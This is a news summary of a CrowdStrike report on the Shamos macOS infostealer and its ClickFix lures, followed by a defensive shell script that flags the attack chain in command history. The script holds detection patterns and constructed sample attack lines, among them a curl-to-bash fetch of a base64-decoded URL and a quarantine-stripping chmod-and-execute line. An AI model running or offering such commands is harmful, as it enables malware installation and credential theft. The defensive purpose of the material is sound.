Particle.news


Shamos Mac Infostealer Spreads Through ClickFix Lures, CrowdStrike Warns

CrowdStrike attributes the AMOS variant to COOKIE SPIDER and details a one-line Terminal technique that sidesteps Gatekeeper by stripping the quarantine attribute before execution.

Image: Shamos malware targets Macs via ClickFix attacks

Overview

  • CrowdStrike reports more than 300 attempted Shamos deliveries in customer environments from June to August 2025 and links the campaign to COOKIE SPIDER.
  • Attackers drive victims to mac-safer[.]com and rescue-mac[.]com through malicious search ads, and to a deceptive GitHub repository posing as iTerm2; both lures instruct the user to paste a single Terminal command as a "fix".
  • The command decodes a URL, retrieves a Bash script, which writes a Mach-O binary to /tmp, strips the com.apple.quarantine extended attribute with xattr (Gatekeeper only inspects files that carry it), marks the file executable with chmod, and launches the stealer.
  • Shamos runs anti-VM checks, uses AppleScript for reconnaissance, collects browser credentials, Keychain items, Apple Notes and cryptocurrency wallet files, then exfiltrates the bundle as out.zip or out.zip.i2 via curl.
  • When the victim runs the command with sudo, the malware gains the root privileges needed to write a com.finder.helper.plist LaunchDaemon for persistence and can drop additional payloads, such as a spoofed Ledger Live app or a botnet module. CrowdStrike's advice is not to run Terminal commands from untrusted sources.
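The chain summarized above (decode, fetch, drop to /tmp, xattr, chmod, run, optional LaunchDaemon) leaves a recognizable footprint in shell history and process command lines. The script below is an added example, not CrowdStrike's code or anything from the report: it scores a command line by how many steps of that chain it matches and flags lines that hit two or more, so a lone, legitimate xattr removal on a downloaded DMG is not reported by itself. The sample command lines are constructed for the example; the base64 string decodes to a non-routable example.invalid URL, and /Library/LaunchDaemons is assumed as the standard install location for the com.finder.helper.plist the report names.

```shell
#!/bin/sh
# Added example (not from the CrowdStrike report): heuristic scoring of command
# lines against the ClickFix/Shamos one-liner chain described above.

# One ERE per line; each corresponds to a step of the chain.
CLICKFIX_PATTERNS='base64 .*-[dD]
curl .*\| *(ba)?sh
xattr .*com\.apple\.quarantine
chmod .*\+x.*/tmp/'

# clickfix_score LINE -> prints the number of chain steps (0-4) the line matches.
# Runs in a subshell so the IFS and glob changes stay local.
clickfix_score() (
  set -f                      # patterns contain * and ?; never glob-expand them
  IFS='
'
  hits=0
  for pat in $CLICKFIX_PATTERNS; do
    if printf '%s\n' "$1" | grep -Eq -- "$pat"; then
      hits=$((hits + 1))
    fi
  done
  printf '%s\n' "$hits"
)

# flag_suspicious [THRESHOLD] -> reads command lines on stdin, prints those whose
# score reaches THRESHOLD (default 2). One matching step alone is too noisy:
# developers strip quarantine flags and chmod +x files all day.
flag_suspicious() {
  threshold=${1:-2}
  while IFS= read -r cmd; do
    if [ "$(clickfix_score "$cmd")" -ge "$threshold" ]; then
      printf '%s\n' "$cmd"
    fi
  done
}

# check_persistence [DIR] -> exit 0 if the LaunchDaemon named in the report is
# present under DIR (assumed default: /Library/LaunchDaemons), 1 otherwise.
check_persistence() {
  dir=${1:-/Library/LaunchDaemons}
  [ -f "$dir/com.finder.helper.plist" ]
}

# Constructed samples (not captured from a real infection).
# Stage 1: decode a URL and pipe the fetched script into bash.
SAMPLE_STAGE1='curl -fsSL "$(echo aHR0cDovL2V4YW1wbGUuaW52YWxpZC94 | base64 -d)" | bash'
# Stage 2: what the fetched script does to the dropped Mach-O in /tmp.
SAMPLE_STAGE2='xattr -d com.apple.quarantine /tmp/update && chmod +x /tmp/update && /tmp/update'
# Benign developer activity and a legitimate one-off quarantine removal.
SAMPLE_BENIGN='git log --oneline | head -n 20'
SAMPLE_USER_UNQUARANTINE='xattr -d com.apple.quarantine ~/Downloads/tool.dmg'

# Demonstration: only the two attack-chain lines are printed.
printf '%s\n%s\n%s\n%s\n' "$SAMPLE_STAGE1" "$SAMPLE_BENIGN" \
  "$SAMPLE_STAGE2" "$SAMPLE_USER_UNQUARANTINE" | flag_suspicious
```

Feed it a shell history file (`flag_suspicious < ~/.zsh_history`) or the command lines from an EDR export. The threshold is the tunable that matters: the quarantine-stripping step on its own is routine for developers, but combined with a pipe-to-shell fetch or a /tmp chmod it is the ClickFix pattern the report describes. Run `check_persistence` as root on a suspect host to look for the LaunchDaemon the sudo variant installs.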